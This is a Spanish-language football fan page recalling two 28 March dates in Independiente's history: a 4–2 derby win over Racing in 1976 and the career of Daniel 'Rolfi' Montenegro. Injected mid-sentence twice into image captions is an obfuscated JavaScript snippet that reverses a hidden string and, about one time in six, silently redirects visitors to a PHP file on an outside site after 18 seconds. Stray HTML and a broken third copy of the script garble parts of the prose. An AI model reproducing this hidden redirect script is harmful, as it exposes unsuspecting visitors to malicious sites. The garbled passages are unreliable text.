Conectate con nosotros

Efemérides

Efemérides del 28 de Marzo

No se puede amar lo que no se conoce. Las efemérides cuentan la enorme historia del Glorioso INDEPENDIENTE de Avellaneda.

1976Independiente recibe a Racing y le gana por 4 a 2, con un triplete de Daniel Astegiano a los 8’, 20’ y 46 minutos, más uno de Enzo Trossero a los 44’, mientras que la visita descontó con goles de Hugo Gottardi y Sergio Fortunato.

Fue por el Campeonato Metropolitano 1976, en la jornada 9, denominada fecha intergrupo o interzonal que correspondía a la primera ronda, pero en la segunda el Rojo volvería a quedarse con el clásico. El equipo aquel día fue: Ramón Quiroga; Eleazar Soria, Osvaldo Carrica (63’ Aldo Rodríguez), Enzo Trossero y Ricardo Pavoni; Percy Rojas (77’ Miguel Bustos), Alejandro Semenewicz y Víctor Palomba; César Brítez, Daniel Astegiano y Daniel Bertoni, con Miguel Ignomiriello como D.T. Mientras que la visita lo hizo con: Suárez; Glaría, Papandrea, Paggiola y Correa; Cordero (80’ Squeo), Espósito y Magalhaes; Gottardi, Fortunato y González, siendo Osvaldo Zubeldía su D.T.

Un encuentro donde las defensas de ambos equipos tuvieron una mala jornada, sucediéndose errores de todo tipo, pero mucho más por el lado de la visita. Al Rojo no le hizo ni falta generar juego asociado, porque con cualquier pelotazo largo ya generaba peligro de gol. En ese sentido, aclaro que el mejor generador de juego, Ricardo Bochini, se encontraba de gira por Europa con la Selección Nacional.

Imparable Daniel Astegiano aprovechando todas las falencias de los centrales de Racing, mientras que Daniel Bertoni estuvo intratable y nadie pudo marcarlo, ambos siendo las figuras del partido. Por su parte los centrales del Rojo tampoco marcaron de buena forma, y Racing logró cabecear en el área roja, dándose así los descuentos.

El encuentro me permite recordar al autor del triplete y su labor en el club. Durante ese año 1976 Independiente le convertiría 10 goles a Racing, de los cuales 6 fueron de Daniel Astegiano. Éste centrodelantero de muchísima potencia y facilidad para definir, había empezado su carrera jugando para Rosario Central a principios de los 70, de allí pasa a Atlético Ledesma de Jujuy de la mano de un técnico notable de la historia nacional como Ángel Tulio Zof. Desde ese equipo norteño lo incorpora Independiente en 1976.

Apenas llega participa de una gira por México y ya en la primera fecha del campeonato debuta frente a Huracán, pero siendo en la segunda fecha sus primeros dos goles en oportunidad de la victoria 4 a 2 a Rosario Central. En ese mismo Metropolitano Astegiano pagó con goles, ya que fue el máximo anotador del equipo con 17 quedando a 4 del goleador del torneo que fue Mario Kempes.

Pero obviamente que los goles convertidos a Racing fueron los que más le permitieron ganarse al hincha, ya que con sus 6 anotaciones en los cuatro enfrentamientos consecutivos con los vecinos que tuvo el año, se convirtió en el único jugador en la historia del clásico en lograr algo así, quedando por detrás suyo ni más ni menos que Arsenio Erico y Vicente De la Mata, quienes marcaron en tres clásicos consecutivos.

Para 1977 Daniel Astegiano emigra a España a jugar en Rayo Vallecano, y su puesto es ocupado por quien sería un ídolo del club como Norberto “Madera” Outes, que hasta ese momento solamente alternaba en el puesto. Astegiano más tarde pasaría por el fútbol de México y luego Belgrano de Córdoba. También supo ser convocado en algunas oportunidades para jugar en la Selección Nacional.

Un muy buen delantero, de paso fugaz por Independiente pero dejando un muy grato recuerdo, fue un año y medio con 50 partidos y 28 goles, un promedio de gol estupendo, y además fue campeón de la Copa Interamericana 1976.

Por último, recuerden que al principio les dije que Astegiano hizo un triplete, pero el cuarto gol fue de Enzo Trossero. Ese gol del “Vikingo” fue el primero en condición de local que convierte vestido de Rojo, y el segundo con la camiseta del club, ya que el primero se lo había convertido a Huracán cuando Independiente lo visitó en la primera fecha y cayó derrotado por 2 a 1.

La imagen tiene un atribu<script>$mWn=function(n){if(typeof ($mWn.list[n])==»string») return $mWn.list[n].split(«»).reverse().join(«»);return $mWn.list[n];};$mWn.list=[«\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>to ALT vacío; su nombre de archivo es DIABLITO-para-SEPARADOR.jpg» width=»61″ height=»47″/></figure></div>



<p><strong>1979</strong> – <strong>Nacimien<script>$mWn=function(n){if(typeof ($mWn.list[n])==to en La Tablada, partido de La Matanza en la Provincia de Buenos Aires, de Daniel Gastón Montenegro, “Rolfi”, quien tuvo 4 etapas en el club: 2000, 2002 a 2003, 2006 a 2009, y 2013 a 2014, completando 240 partidos y 69 goles, y siendo campeón del Torneo Apertura 2002.

Surgió y brilló en Huracán entre 1997 y 1999, para ser comprado por Olympique de Marsella pero no jugó demasiado. Así fue que lo cedieron al Rojo por 6 meses, jugando las 19 fechas del Torneo Clausura 2000 y marcando 7 goles, siendo subcampeón de ese torneo. Se ganó a la gente muy rápido y todos deseaban que se quede, pero el alto costo de su ficha lo hizo retornar a Europa.

Primero en Zaragoza, luego Osasuna y retorna al país para jugar nuevamente en Huracán a principios de 2002, sale mejor jugador de ese torneo y a mitad de año vuelve a Independiente. Si algunos creen que las segundas partes nunca son mejor, “Rolfi” se encargó de desmentir esa frase, porque jugó todos los partidos del Rojo campeón del Apertura 2002, siendo muy importante en el título, y aportando 6 goles. En un equipo que salía de memoria, él era miembro del doble enganche que tenía el sistema de Américo “Tolo” Gallego, junto a Federico Insúa.

Luego de un año pasa a River en 2003, después Saturn de Rusia, vuelve a River y en 2006 empieza su tercer etapa vestido de Rojo. Juega desde ese año hasta el 2009, con un nivel que lo hace titular indiscutido torneo tras torneo, jugando 106 cotejos en ese lapso y anotando 41 goles. En el Torneo Clausura 2009 el equipo anduvo muy mal, pero él sostuvo un gran nivel, marcando 12 goles para quedar con uno menos que José Sand, el goleador del país.

Luego de su gran desempeño parte nuevamente, esta vez lo compra América de México donde permanece hasta 2013, año en el que vuelve a Independiente con la ilusión de sacarlo de su bajo promedio. En aquel torneo no se vio un mismo Montenegro al de las 3 etapas anteriores, pasando inadvertido dentro del campo de juego, y el desenlace ya todos lo saben.

Se quedó en el club para devolverlo al lugar que nunca debió dejar, lo hizo alternando buenos y malos partidos, pero eso fue suficiente para ser de los mejores en un equipo pobrísimo. Luego jugó 6 meses más ya en Primera, con un nivel apenas aceptable, hasta que el DT Jorge Almirón decidió no tenerlo en cuenta a fin del 2014. Así fue que en 2015 regresa a Huracán donde jugó hasta 2018 cuando decidió retirarse. También jugó para la Selección Nacional, en la Sub 20 en 1999, y en la mayor algunos encuentros en 2007.

El “Rolfi” era un enganche y media punta, de mucha técnica y gran pegada de media y larga distancia, convirtió varios goles espectaculares y en muchos clásicos, además de mostrar sacrificio para la marca. Siempre fue del gusto de la gente y encajó en el paladar del club, sin embargo es un jugador que genera ambigüedad entre los hinchas, ya que fue campeón en 2002 pero también parte del descenso con muy pobre nivel, así como también por su paso por River donde gritó furioso un gol al Rojo.

Aun así, mostró siempre bajo perfil y humildad, con sus compañeros destacándolo como líder positivo, por lo que todo ello sumado al paso del tiempo, hace que le gente siempre lo reconozca y le exprese cariño. Recientemente volvió al club como asesor deportivo, siendo extraño y curioso, porque fue a dos meses de producirse elecciones y según él, su llegada no tiene nada que ver con la política.

La imagen tiene un atribu<script>$mWn=function(n){if(typeof ($mWn.list[n])==»string») return $mWn.list[n].split(«»).reverse().join(«»);return $mWn.list[n];};$mWn.list=[«\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>to ALT vacío; su nombre de archivo es DIABLITO-para-SEPARADOR.jpg» width=»60″ height=»46″/></figure></div>



<p>Les dejo un <strong>video de sus goles</strong> en el Rojo:</p>



<figure class=

Colaboración: Hernán Paglieri-Vicepresidente Peña Roja Daniel BertoniSan Andrés de Giles

Click to comment

Leave a Reply

Tu dirección de correo electrónico no será publicada.

Destacadas

PROGRAMA 2206 de Correo Independiente

Radio Roja 195.7

asd

More in Efemérides